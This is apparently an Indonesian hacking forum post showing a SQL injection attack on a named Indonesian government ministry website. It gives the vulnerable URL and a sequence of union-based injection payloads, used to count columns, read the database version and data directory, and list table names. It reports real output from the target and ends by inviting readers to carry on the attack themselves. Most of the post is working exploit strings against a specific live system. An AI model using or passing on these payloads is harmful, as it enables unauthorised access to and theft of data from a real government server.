SQLi on Deptan.go.id

Sebenarnya ini udah merupakan bug lama yang sampe sekarang belum di patch ! Cuma untung servernya "safe mode : off" , but remember.. nothing secure :D Tapi banyak cara menuju roma, watch yours system !

Vull : http://www.deptan.go.id/tampil.php?page=kelembagaan&id=31
1=1 true ..
1=0 false ..

Code :

tampil.php?page=kelembagaan&id=31 order by 10-- false
tampil.php?page=kelembagaan&id=31 order by 9 -- true

Code:

tampil.php?page=kelembagaan&id=31 and 1=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
tampil.php?page=kelembagaan&id=-31and 1=1 union all select1,2,3,4,5,6,7,8,9-- Hasilnya = 4

versinya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,version(),5,6,7,8,9-- 

hasilnya : 5.0.45-standard-log

usernya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,@@datadir,5,6,7,8,9-- hasilnya = /opt/coolstack/mysql_32bit/data/ /

Some Info :
- version() = versinya
- database() = databsenya
- user() = usernya
- @@datadir = data direktorinya

Code:

tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,CHAR(97, 108, 100, 106, 97, 122, 97, 114, 97),5,6,7,8,9--

tablenya :

# tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—


--------------------------------------------------------------

You can continue yourself, because some reason :)